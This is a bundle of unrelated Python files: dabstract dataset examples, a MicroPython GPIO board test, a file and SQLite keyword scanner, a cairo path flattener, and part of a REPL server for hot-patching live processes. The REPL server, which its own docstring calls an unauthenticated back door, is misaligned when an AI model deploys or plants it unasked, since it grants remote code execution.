from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data' if not already performed and add it to the dataset as a 'feat' key
# if new_key is not specified, the item of 'data' is replaced by the feature extracted version
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# again you can specify multiprocessing as:
# db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat', workers=2)
# -------------------------------------------------------------------------
### Feature extraction (Nested)
### paths/feat is a mandatory field that should be added when doing feature extraction
### as it determines where the features are stored
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain()
processor2 = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction for the first time
db.prepare_feat('data',fe_name='np_audio', fe_dp=processor, new_key='feat')
# do feature extraction for the second time (e.g. if its modular, this could save computation time)
db.prepare_feat('feat',fe_name='raw_audio', fe_dp=processor2, new_key='feat2')
# -------------------------------------------------------------------------
### Load data from memory
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data'
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# load features into memory
db.load_memory('feat')
# -------------------------------------------------------------------------
### Load data from memory and keep internal structure
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
# define processor
processor = ProcessingChain().add(Framing(windowsize=10, stepsize=10))
# do feature extraction on 'data'
db.prepare_feat('data',fe_name='Framing1010', fe_dp=processor, new_key='feat')
# load features into memory
db.load_memory('feat', keep_structure=True)
# -------------------------------------------------------------------------
### Splitting
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
db.summary()
# define processor
processor = ProcessingChain().add(Framing(windowsize=0.1, stepsize=0.1))
# prepare features
db.prepare_feat('data',fe_name='Framing0101', fe_dp=processor, new_key='feat')
# add splitting
db.add_split(split_size=0.5)
# show summary
db.summary()
# both feat and data are timesplitted and read from disk
print(db['data'][0].shape)
print(db['feat'][0].shape)
# -------------------------------------------------------------------------
### Splitting (per frame)
from examples.introduction.custom.dataset.dbs.EXAMPLE import EXAMPLE
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# init db
db = EXAMPLE(paths = { 'data': os.path.join('data','data'),
'meta': os.path.join('data','data'),
'feat': os.path.join('data', 'feat')}) #mandatory
db.summary()
# define processor
processor = ProcessingChain().add(Framing(windowsize=0.1, stepsize=0.1))
# prepare features
db.prepare_feat('data',fe_name='Framing0101', fe_dp=processor, new_key='feat')
# add splitting
db.add_split(split_size=1, type='samples', reference_key='feat')
# show summary
db.summary()
# both feat and data are timesplitted and read from disk
print(db['data'][0].shape)
print(db['feat'][0].shape)
# -------------------------------------------------------------------------
### Dataset from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
## Loads the following yaml file
# datasets:
# - name: !class [custom.dataset.dbs.EXAMPLE]
# parameters:
# paths:
# data: !pathjoin [data,data]
# meta: !pathjoin [data,data]
# tmp: !pathjoin [data,tmp]
# !class is a custom constructor that load_yaml_config uses to replace that item by that class
data = load_yaml_config(filename='EXAMPLE_anomaly2', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config through custom_dir
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable to indicate where custom fct are (custom, as in, not present in dabstract)
# This can be used instead of !class [] depending on what you think is most convenient
# structure of the custom should be:
# /dbs/.. for datasets
# /dp/.. for processing layers
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config through custom_dir with xval
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_xval', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print(data.get_xval_set(set='train',fold=0))
# -------------------------------------------------------------------------
### Dataset from config with two datasets and splitting
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.add_split(0.5)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config with two datasets and splitting from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_split', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Dataset from config with two datasets and subsampling on string
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print([subdb for subdb in data['data']['subdb']])
data.add_select((lambda x,k: x['data']['subdb'][k]=='normal'))
data.summary()
print([subdb for subdb in data['data']['subdb']])
# -------------------------------------------------------------------------
### Dataset from config with two datasets and random subsampling
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
from dabstract.dataset.select import random_subsample
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
print([subdb for subdb in data['data']['subdb']])
data.add_select(random_subsample(0.5))
data.summary()
print([subdb for subdb in data['data']['subdb']])
# -------------------------------------------------------------------------
### Dataset from config with two datasets and subsampling on a list and random from config
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data = load_yaml_config(filename='EXAMPLE_anomaly_subsample', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data.summary()
# -------------------------------------------------------------------------
### Merge two datasets
from dabstract.dataset.helpers import dataset_from_config
from dabstract.utils import load_yaml_config
from dabstract.dataset.select import random_subsample
# define custom variable
os.environ["dabstract_CUSTOM_DIR"] = "custom"
# load dataset
data0 = load_yaml_config(filename='EXAMPLE_anomaly', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data0.summary()
# load dataset
data1 = load_yaml_config(filename='EXAMPLE_anomaly2', path=os.path.join('configs', 'dbs'), walk=True,
post_process=dataset_from_config)
data1.summary()
# merge
data = data0+data1
|
nilq/baby-python
|
python
|
from .model import EfficientUnetPlusPlus
|
nilq/baby-python
|
python
|
import machine
import time
import json
# GPIO connections on test fixture
gpio_conn = [
{ 'out': 2, 'io': (23, 32) },
{ 'out': 1, 'io': (33, 34) },
{ 'out': 2, 'io': (5, 12, 35) },
{ 'out': 2, 'io': (4, 18) },
{ 'out': 2, 'io': (13, 15) },
{ 'out': 2, 'io': (2, 14) }
]
def testGPIO():
# List of problem pairs (output, input)
problems = []
# Test pins as output in two cycles. There's one set of connections
# that connects three pins together, but one is input only.
for out_idx in range(2):
# Go through each defined connection for setup
for conn in gpio_conn:
if out_idx < conn['out']:
# Make the indexed pin output, the other pins input
for pin_idx, pin in enumerate(conn['io']):
if pin_idx == out_idx:
machine.Pin(pin, machine.Pin.OUT)
else:
machine.Pin(pin, machine.Pin.IN)
# Go through each defined connection again for testing
for test_conn in gpio_conn:
if out_idx < test_conn['out']:
# Turn the output for the indexed connection under test high,
# the others low
for conn in gpio_conn:
if out_idx < conn['out']:
machine.Pin(conn['io'][out_idx]) \
.value(1 if conn == test_conn else 0)
# Now check that the inputs connected to the active output
# are high and the rest are low
for conn in gpio_conn:
if out_idx < conn['out']:
for pin_idx, pin in enumerate(conn['io']):
if pin_idx != out_idx and machine.Pin(pin).value() \
!= (1 if conn == test_conn else 0):
problems.append((conn['io'][out_idx], pin))
# Return list of problem pairs
return list(set(problems))
def getVPlus():
return machine.ADC(machine.Pin(39)).read() * 15.7 * 1.1 / 4095
def getV3V3():
return machine.ADC(machine.Pin(36)).read() * 5.7 * 1.1 / 4095
# Wait for network
network_tries = 8
while lan.ifconfig()[0] == '0.0.0.0' and network_tries:
time.sleep(2)
network_tries = network_tries - 1
# Get the IP address
ip = lan.ifconfig()[0]
# Run the GPIO test to discover problems
gpio_problems = testGPIO()
# Print all test results as JSON
print(json.dumps({
'vplus': getVPlus(),
'v3v3': getV3V3(),
'gpio': {
'ok': not bool(gpio_problems),
'problems': gpio_problems,
},
'ip': {
'ok': ip != '0.0.0.0',
'address': ip
}
}))
|
nilq/baby-python
|
python
|
import os
import re
import sqlite3
import configparser
from helpers.logger import Logger
from helpers.match import MatchDatabase, MatchSource
from helpers.searchwords import Searchwords
class File:
config = configparser.ConfigParser()
config.read("config.ini")
non_regex_indicator = config.get("ProgramConfig", 'non_regex_indicator')
def __init__(self, file_path):
self.file_path = file_path
self.name = os.path.basename(file_path).replace(".", "_")
self.src_matches = list()
self.db_matches = list()
self.icon = "insert_drive_file" # Materialise Icon
self.fa_icon = "file" # Font Awesome icon, used in the tree-view
self.all_matches = list()
self.unique_words = list()
self.grouped_matches = dict() #contains an array of Match objects for each unique word
def find_matches_in_db_file(self):
# Set icon of file
self.icon = "insert_invitation"
self.fa_icon = "database"
db = sqlite3.connect(self.file_path)
cursor = db.cursor()
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
tables = cursor.fetchall()
for table_name in tables:
table_name = table_name[0]
cursor = db.execute("SELECT * from %s" % table_name)
line = 0
for row in cursor.fetchall():
line += 1
for matchword in Searchwords.db_search_words:
exclude = False
if re.match(File.non_regex_indicator, str(row)):
Searchwords.db_search_words[matchword].regex = True
if re.search(matchword, str(row), re.IGNORECASE):
for item in Searchwords.exclusion_list:
if item[0] == matchword and item[1] in self.file_path:
Logger("Database xclusion found: %s in file %s" % (str(item[0]), self.file_path), Logger.INFO)
exclude = True
if exclude == False:
importance = Searchwords.db_search_words[matchword]
db_match = MatchDatabase(matchword, line, str(table_name), str(row), importance)
self.db_matches.append(db_match)
self.all_matches.append(db_match)
self.orden_matches()
def find_matches_in_src_file(self, CODE_OFFSET, QUERY_IMPORTANCE):
try:
with open(self.file_path, "r", encoding="utf8", errors='ignore') as file:
lines_in_file = file.read().splitlines()
except IOError as e:
Logger("could not open file '%s'. Error:" %(self.file_path, e.strerror), Logger.WARNING)
return list()
line_index = 1
for line in lines_in_file:
for query in Searchwords.src_search_words.keys():
if int(Searchwords.src_search_words[query]) > QUERY_IMPORTANCE:
if re.match(File.non_regex_indicator, query):
Searchwords.src_search_words[query].regex = True
if re.search(query, line.lower(), re.IGNORECASE):
exclude = False
for item in Searchwords.exclusion_list:
if re.search(item[0], line, re.IGNORECASE):
if (item[1] in self.file_path or (item[1] == "" or item[1] is None)):
Logger("Exclusion found: %s in file %s" % (str(item[0]), self.file_path),
Logger.INFO)
exclude = True
if exclude == False:
upper_range = min(line_index + CODE_OFFSET, len(lines_in_file)+1)
lower_range = max(line_index - CODE_OFFSET-1, 1)
src_match = MatchSource(query, line_index, lines_in_file[lower_range:upper_range],
Searchwords.src_search_words[query], len(lines_in_file))
self.all_matches.append(src_match)
self.src_matches.append(src_match)
line_index = line_index + 1
self.orden_matches()
def orden_matches(self):
grouped_matches = list()
#grouping
for match in self.all_matches:
if match.matchword not in self.unique_words:
self.unique_words.append(match.matchword)
for word in self.unique_words:
self.grouped_matches[word] = list()
for match in self.all_matches:
if match.matchword == word:
grouped_matches.append(match)
self.grouped_matches[word].append(match)
# To sort here, use this. But searchwords itself are sorted so.
# print(self.name)
# for matches in reversed([self.grouped_matches[i] for i in sorted(self.grouped_matches,
# key=Searchwords.all_searchwords.__getitem__)]):
# for match in matches:
# print(match.matchword)
# ----
#self.src_matches = grouped_matches
# order them according to query importance
# ordened_matches = OrderedDict()
# for match in self.src_matches:
# ordened_matches[match.matchword] = match
# sorting_dict = OrderedDict(sorted(ordened_matches.items(), key=itemgetter(0)))
# temp_matches = []
# for f, match in sorting_dict.items():
# temp_matches.insert(0, match)
# self.src_matches = temp_matches
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
"""
Interpret all transforms, thereby flattening cairo operations
to just a few primitives, such as move_to line_to and curve_to.
"""
import sys
from math import sin, cos, pi
from bruhat.argv import argv
from bruhat.render import back
from bruhat.render.base import Context
class Flatten(Context):
def __init__(self):
Context.__init__(self)
self.path = back.Compound()
self.paths = []
def move_to(self, x, y):
x, y = self.matrix(x, y)
item = back.MoveTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def line_to(self, x, y):
x, y = self.matrix(x, y)
item = back.LineTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def curve_to(self, x0, y0, x1, y1, x2, y2):
x0, y0 = self.matrix(x0, y0)
x1, y1 = self.matrix(x1, y1)
x2, y2 = self.matrix(x2, y2)
item = back.CurveTo_Pt(x0, -y0, x1, -y1, x2, -y2)
self.path.append(item)
self.pos = x2, y2
def rel_move_to(self, dx, dy):
assert self.pos is not None, "no current point"
x, y = self.pos
dx, dy = self.matrix.transform_distance(dx, dy)
x, y = x+dx, y+dy
item = back.MoveTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def rel_line_to(self, dx, dy):
assert self.pos is not None, "no current point"
x, y = self.pos
dx, dy = self.matrix.transform_distance(dx, dy)
x, y = x+dx, y+dy
item = back.LineTo_Pt(x, -y)
self.path.append(item)
self.pos = x, y
def rel_curve_to(self, dx0, dy0, dx1, dy1, dx2, dy2):
assert self.pos is not None, "no current point"
x, y = self.pos
dx0, dy0 = self.matrix.transform_distance(dx0, dy0)
dx1, dy1 = self.matrix.transform_distance(dx1, dy1)
dx2, dy2 = self.matrix.transform_distance(dx2, dy2)
x0, y0 = x+dx0, y+dy0
x1, y1 = x+dx1, y+dy1
x2, y2 = x+dx2, y+dy2
item = back.CurveTo_Pt(x0, -y0, x1, -y1, x2, -y2)
self.path.append(item)
self.pos = x2, y2
def arc(self, x, y, radius, angle1, angle2):
# stay in user space coordinates
if self.pos is None:
x1, y1 = x+radius*cos(angle1), y+radius*sin(angle1)
self.move_to(x1, y1)
p = back.arc_to_bezier_pt(x, -y, radius, -angle2, -angle1)
p = p.reversed()
p.process_cairo(self)
def arc_negative(self, x, y, radius, angle1, angle2):
# stay in user space coordinates
if self.pos is None:
x1, y1 = x+radius*cos(angle1), y+radius*sin(angle1)
self.move_to(x1, y1)
p = back.arc_to_bezier_pt(x, -y, radius, -angle1, -angle2)
p.process_cairo(self)
def close_path(self):
item = back.ClosePath()
self.path.append(item)
def set_source_rgba(self, r, g, b, a):
deco = back.RGBA(r, g, b, a)
self.path.append(deco)
def set_line_width(self, w):
deco = back.LineWidth_Pt(w)
self.path.append(deco)
def stroke(self):
deco = back.Stroke()
self.path.append(deco)
self.paths.append(self.path)
self.path = back.Compound()
self.pos = None
def fill_preserve(self):
deco = back.FillPreserve()
self.path.append(deco)
def fill(self):
deco = back.Fill()
self.path.append(deco)
self.paths.append(self.path)
self.path = back.Compound()
self.pos = None
def test():
def draw_test(cxt):
cxt.translate(100., 0.)
cxt.scale(0.8, 0.7)
cxt.move_to(10., 10.)
cxt.line_to(100., 100.)
cxt.arc(200., 200., 80., 0., 1.1*pi)
cxt.scale(0.7, 1.2)
cxt.translate(50., 50.)
cxt.line_to(300., 300.)
cxt.arc_negative(400., 300., 60., 0., -1.8*pi)
cxt.line_to(600.-10, 400.-10)
cxt.stroke()
import cairo
W, H = 600., 400. # point == 1/72 inch
# black line should follow the red line.
surface = cairo.PDFSurface("output.pdf", W, H)
context = cairo.Context(surface)
context.save()
context.set_source_rgba(1., 0., 0., 0.5)
context.set_line_width(10.)
draw_test(context)
context.restore()
cxt = Flatten()
draw_test(cxt)
for path in cxt.paths:
path.process_cairo(context)
surface.finish()
print("OK")
if __name__ == "__main__":
test()
|
nilq/baby-python
|
python
|
"""REPL server for inspecting and hot-patching a running Python process.
This module makes your Python app serve up a REPL (read-eval-print-loop)
over TCP, somewhat like the Swank server in Common Lisp.
In a REPL session, you can inspect and mutate the global state of your running
program. You can e.g. replace top-level function definitions with new versions
in your running process, or reload modules from disk (with `importlib.reload`).
The REPL server runs in a daemon thread. Terminating the main thread of your
process will terminate the server, also forcibly terminating all open REPL
sessions in that process.
**SECURITY WARNING**: A REPL SERVER IS ESSENTIALLY A BACK DOOR.
Currently, we provide NO authentication or encryption. Anyone can connect, and
once connected, do absolutely anything that the user account running your app
can do. Connections are anonymous.
Hence, only use this server in carefully controlled environments, such as:
a) Your own local machine, with no untrusted human users on it,
b) A dedicated virtual server running only your app, in which case
the OS level already provides access control and encrypted connections.
Even then, serve this ONLY on the loopback interface, to force users to connect
to the machine via SSH first (or have physical local console access).
With that out of the way, to enable the server in your app::
from unpythonic.net import server
server.start(locals={})
The `locals=...` argument sets the top-level namespace for variables for use by
the REPL. It is shared between REPL sessions.
Using `locals=globals()` makes the REPL directly use the calling module's
top-level scope. If you want a clean environment, where you must access any
modules through `sys.modules`, use `locals={}` (recommended).
To connect to a running REPL server (with tab completion and Ctrl+C support)::
python3 -m unpythonic.net.client localhost 1337
If you're already running in a local Python REPL, this should also work::
from unpythonic.net import client
client.connect(("127.0.0.1", 1337))
For basic use (history, but no tab completion), you can use::
rlwrap netcat localhost 1337
or even just (no history, no tab completion)::
netcat localhost 1337
**CAUTION**: Python's builtin `help(foo)` does not work in this REPL server.
It cannot, because the client runs a complete second input prompt (that holds
the local TTY), separate from the input prompt running on the server.
So the stdin/stdout are not just redirected to the socket.
Trying to open the built-in help will open the help locally on the server,
causing the client to hang. The top-level `help()`, which uses a command-based
interface, appears to work, until you ask for a help page, at which point it
runs into the same problem.
As a workaround, we provide `doc(foo)`, which just prints the docstring (if any),
and performs no paging.
**CAUTION**: Python was not designed for arbitrary hot-patching. If you change
a **class** definition (whether by re-assigning the reference or by reloading
the module containing the definition), only new instances will use the new
definition, unless you specifically monkey-patch existing instances to change
their type.
The language docs hint it is somehow possible to retroactively change an
object's type, if you're careful with it:
https://docs.python.org/3/reference/requestmodel.html#id8
In fact, ActiveState recipe 160164 explicitly tells how to do it,
and even automate that with a custom metaclass:
https://github.com/ActiveState/code/tree/master/recipes/Python/160164_automatically_upgrade_class_instances
Based on socketserverREPL by Ivor Wanders, 2017. Used under the MIT license.
https://github.com/iwanders/socketserverREPL
Based on macropy.core.MacroConsole by Li Haoyi, Justin Holmgren, Alberto Berti and all the other contributors,
2013-2019. Used under the MIT license.
https://github.com/azazel75/macropy
Based on imacropy.console by the same author as unpythonic. 2-clause BSD license.
https://github.com/Technologicat/imacropy
**Trivia**:
Default port is 1337, because connecting to a live Python program can be
considered somewhat that. Refer to https://megatokyo.com/strip/9.
The `socketserverREPL` package uses the same default, and actually its
`repl_tool.py` can talk to this server (but doesn't currently feature
remote tab completion).
The default port for the control channel is 8128, because it's for
*completing* things, and https://en.wikipedia.org/wiki/Perfect_number
This is the first one above 1024, and was already known to Nicomachus
around 100 CE.
"""
# TODO: use logging module instead of server-side print
# TODO: support several server instances? (makes sense if each is connected to a different module)
__all__ = ["start", "stop"] # Exports for code that wants to embed the server.
import rlcompleter # yes, just rlcompleter without readline; backend for remote tab completion.
import threading
import sys
import os
import time
import socketserver
import atexit
import inspect
from itertools import count
try:
# Advanced macro-enabled console. Importing this also boots up `mcpyrate`.
from mcpyrate.repl.console import MacroConsole as Console
except ModuleNotFoundError:
from code import InteractiveConsole as Console
from ..collections import ThreadLocalBox, Shim
from ..misc import async_raise, namelambda
from ..symbol import sym
from .util import ReuseAddrThreadingTCPServer, socketsource
from .msg import MessageDecoder
from .common import ApplevelProtocolMixin
from .ptyproxy import PTYSocketProxy
# Because "These are only defined if the interpreter is in interactive mode.",
# we have to do something like this.
# https://docs.python.org/3/library/sys.html#sys.ps1
try:
_original_ps1, _original_ps2 = sys.ps1, sys.ps2
except AttributeError:
_original_ps1, _original_ps2 = None, None
_server_instance = None
_active_sessions = {}
_session_counter = count(start=1) # for generating session ids, needed for pairing control and REPL sessions.
_halt_pending = False
_original_stdin = sys.stdin
_original_stdout = sys.stdout
_original_stderr = sys.stderr
_threadlocal_stdin = ThreadLocalBox(_original_stdin)
_threadlocal_stdout = ThreadLocalBox(_original_stdout)
_threadlocal_stderr = ThreadLocalBox(_original_stderr)
_console_locals_namespace = None
_banner = None
# --------------------------------------------------------------------------------
# Exports for REPL sessions
# These `_get_source` and `doc` functions come from `mcpyrate.repl.utils`,
# with the coloring code removed.
#
# We strictly need a local copy of only if `mcpyrate` is not installed,
# to allow viewing docstrings in the stdlib console (which does not use
# colored output anyway).
def _get_source(obj):
# `inspect.getsourcefile` accepts "a module, class, method, function,
# traceback, frame, or code object" (the error message says this if
# we try it on something invalid).
#
# So if `obj` is an instance, we need to try again with its `__class__`.
for x in (obj, obj.__class__): # TODO: other places to fall back to?
try:
filename = inspect.getsourcefile(x)
source, firstlineno = inspect.getsourcelines(x)
return filename, source, firstlineno
except (TypeError, OSError):
continue
raise NotImplementedError
def doc(obj):
"""Print an object's docstring, non-interactively.
Additionally, if the information is available, print the filename
and the starting line number of the definition of `obj` in that file.
This is printed before the actual docstring.
This works around the problem that in a REPL session, the stdin/stdout
of the builtin `help()` are not properly redirected.
And that looking directly at `some_macro.__doc__` prints the string
value as-is, without formatting it.
NOTE: if you have the `mcpyrate` package installed, you can use
the IPython-like `obj?` and `obj??` syntax instead (provided by
`mcpyrate.repl.console.MacroConsole`).
"""
try:
filename, source, firstlineno = _get_source(obj)
print(f"{filename}:{firstlineno}", file=sys.stderr)
except NotImplementedError:
pass
if not hasattr(obj, "__doc__") or not obj.__doc__:
print("<no docstring>", file=sys.stderr)
return
print(inspect.cleandoc(obj.__doc__), file=sys.stderr)
# TODO: detect stdout, stderr and redirect to the appropriate stream.
def server_print(*values, **kwargs):
"""Print to the original stdout of the server process."""
print(*values, **kwargs, file=_original_stdout)
def halt(doit=True):
"""Tell the REPL server to shut down after the last client has disconnected.
To cancel a pending halt, use `halt(False)`.
"""
if doit:
msg = "Halt requested, REPL server will shut down after the last client disconnects."
else:
msg = "Halt canceled, REPL server will remain running."
global _halt_pending
_halt_pending = doit
print(msg)
server_print(msg)
_bg_results = {}
_bg_running = sym("_bg_running")
_bg_success = sym("_bg_success")
_bg_fail = sym("_bg_fail")
def bg(thunk):
"""Spawn a thread to run `thunk` in the background. Return the thread object.
To get the return value of `thunk`, see `fg`.
"""
@namelambda(thunk.__name__)
def worker():
_bg_results[thread.ident] = (_bg_running, None)
try:
result = thunk()
except Exception as err:
_bg_results[thread.ident] = (_bg_fail, err)
else:
_bg_results[thread.ident] = (_bg_success, result)
thread = threading.Thread(target=worker, name=thunk.__name__, daemon=True)
thread.start()
return thread
# TODO: we could use a better API, but I don't want timeouts or a default return value.
def fg(thread):
"""Get the return value of a `bg` thunk.
`thread` is the thread object returned by `bg` when the computation was started.
If the thread is still running, return `thread` itself.
If completed, **pop** the result. If the thread:
- returned normally: return the value.
- raised an exception: raise that exception.
"""
if "ident" not in thread:
raise TypeError(f"Expected a Thread object, got {type(thread)} with value {repr(thread)}.")
if thread.ident not in _bg_results:
raise ValueError(f"No result for thread {repr(thread)}")
# This pattern is very similar to that used by unpythonic.fun.memoize...
status, value = _bg_results[thread.ident]
if status is _bg_running:
return thread
_bg_results.pop(thread.ident)
if status is _bg_success:
return value
elif status is _bg_fail:
raise value
assert False
# Exports available in REPL sessions.
# These will be injected to the `locals` namespace of the REPL session when the server starts.
_repl_exports = {doc, server_print, halt, bg, fg}
# --------------------------------------------------------------------------------
# Server itself
class ControlSession(socketserver.BaseRequestHandler, ApplevelProtocolMixin):
"""Entry point for connections to the control server.
We use a separate connection for control to avoid head-of-line blocking.
For example, how the remote tab completion works: the client sends us
a request. We invoke `rlcompleter` on the server side, and return its
response to the client.
"""
def handle(self):
# TODO: ipv6 support
caddr, cport = self.client_address
client_address_str = f"{caddr}:{cport}"
class ClientExit(Exception):
pass
try:
server_print(f"Control channel for {client_address_str} opened.")
# TODO: fancier backend? See examples in https://pymotw.com/3/readline/
completer_backend = rlcompleter.Completer(_console_locals_namespace)
# From the docstring of `socketserver.BaseRequestHandler`:
# This class is instantiated for each request to be handled.
# ...
# Since a separate instance is created for each request, the
# handle() method can define other arbitrary instance variables.
self.sock = self.request
self.decoder = MessageDecoder(socketsource(self.sock))
self.paired_repl_session_id = None
while True:
# The control server follows a request-reply application-level
# protocol, which is essentially a remote procedure call
# interface. We use ApplevelProtocolMixin, which allows us to
# transmit the function name, arguments and return values in
# a dictionary format.
#
# A request from the client is a dictionary, with str keys. It
# must contain the field "command", with its value set to one
# of the recognized command names as an `str`.
#
# Existence and type of any other fields depends on each
# individual command. This server source code is the official
# documentation of this small app-level protocol.
#
# For each request received, the server sends a reply, which is
# also a dictionary with str keys. It has one compulsory field:
# "status". Upon success, it must contain the string "ok". The
# actual return value(s) (if any) may be provided in arbitrary
# other fields, defined by each individual command.
#
# Upon failure, the "status" field must contain the string
# "failed". An optional (but strongly recommended!) "reason"
# field may contain a short description about the failure.
# More information may be included in arbitrary other fields.
request = self._recv()
if not request:
server_print(f"Socket for {client_address_str} closed by client.")
raise ClientExit
if "command" not in request:
reply = {"status": "failed", "reason": "Request is missing the 'command' field."}
elif request["command"] == "DescribeServer":
reply = {"status": "ok",
# needed by client's prompt detector
"prompts": {"ps1": sys.ps1, "ps2": sys.ps2},
# for future-proofing only
"control_protocol_version": "1.0",
"supported_commands": ["DescribeServer", "PairWithSession", "TabComplete", "KeyboardInterrupt"]}
elif request["command"] == "PairWithSession":
if "id" not in request:
reply = {"status": "failed", "reason": "Request is missing the PairWithSession parameter 'id'."}
else:
if request["id"] not in _active_sessions:
errmsg = f"Pairing control session failed; there is no active REPL session with id={request['id']}."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
server_print(f"Pairing control session for {client_address_str} to REPL session {request['id']}.")
self.paired_repl_session_id = request["id"]
reply = {"status": "ok"}
elif request["command"] == "TabComplete":
if "text" not in request or "state" not in request:
reply = {"status": "failed", "reason": "Request is missing at least one of the TabComplete parameters 'text' and 'state'."}
else:
completion = completer_backend.complete(request["text"], request["state"])
# server_print(request, reply) # DEBUG
reply = {"status": "ok", "result": completion}
elif request["command"] == "KeyboardInterrupt":
server_print(f"Client {client_address_str} sent request for remote Ctrl+C.")
if not self.paired_repl_session_id:
errmsg = "This control channel is not currently paired with a REPL session."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
server_print(f"Remote Ctrl+C in session {self.paired_repl_session_id}.")
try:
target_session = _active_sessions[self.paired_repl_session_id]
target_thread = target_session.thread
except KeyError:
errmsg = f"REPL session {self.paired_repl_session_id} no longer active."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
except AttributeError:
errmsg = f"REPL session {self.paired_repl_session_id} has no 'thread' attribute."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
try:
# The implementation of async_raise is one of the dirtiest hacks ever,
# and only works on Python implementations providing the `ctypes` module,
# since Python has no officially exposed mechanism to trigger an asynchronous
# exception (such as KeyboardInterrupt) in an arbitrary thread.
async_raise(target_thread, KeyboardInterrupt)
except (ValueError, SystemError, RuntimeError) as err:
server_print(err)
reply = {"status": "failed", "reason": err.args, "failure_type": str(type(err))}
else:
reply = {"status": "ok"}
else:
cmd = request["command"]
reply = {"status": "failed", "reason": f"Command '{cmd}' not understood by this server."}
self._send(reply)
except ClientExit:
server_print(f"Control channel for {client_address_str} closed.")
except BaseException as err:
server_print(err)
class ConsoleSession(socketserver.BaseRequestHandler):
"""Entry point for connections from the TCP server.
Primary channel. This serves the actual REPL session.
"""
def handle(self):
# TODO: ipv6 support
caddr, cport = self.client_address
client_address_str = f"{caddr}:{cport}"
try:
# for control/REPL pairing
self.session_id = next(_session_counter)
_active_sessions[self.session_id] = self # also for exit monitoring
# self.request is the socket. We don't need a StreamRequestHandler with self.rfile and self.wfile,
# since we in any case only forward raw bytes between the PTY master FD and the socket.
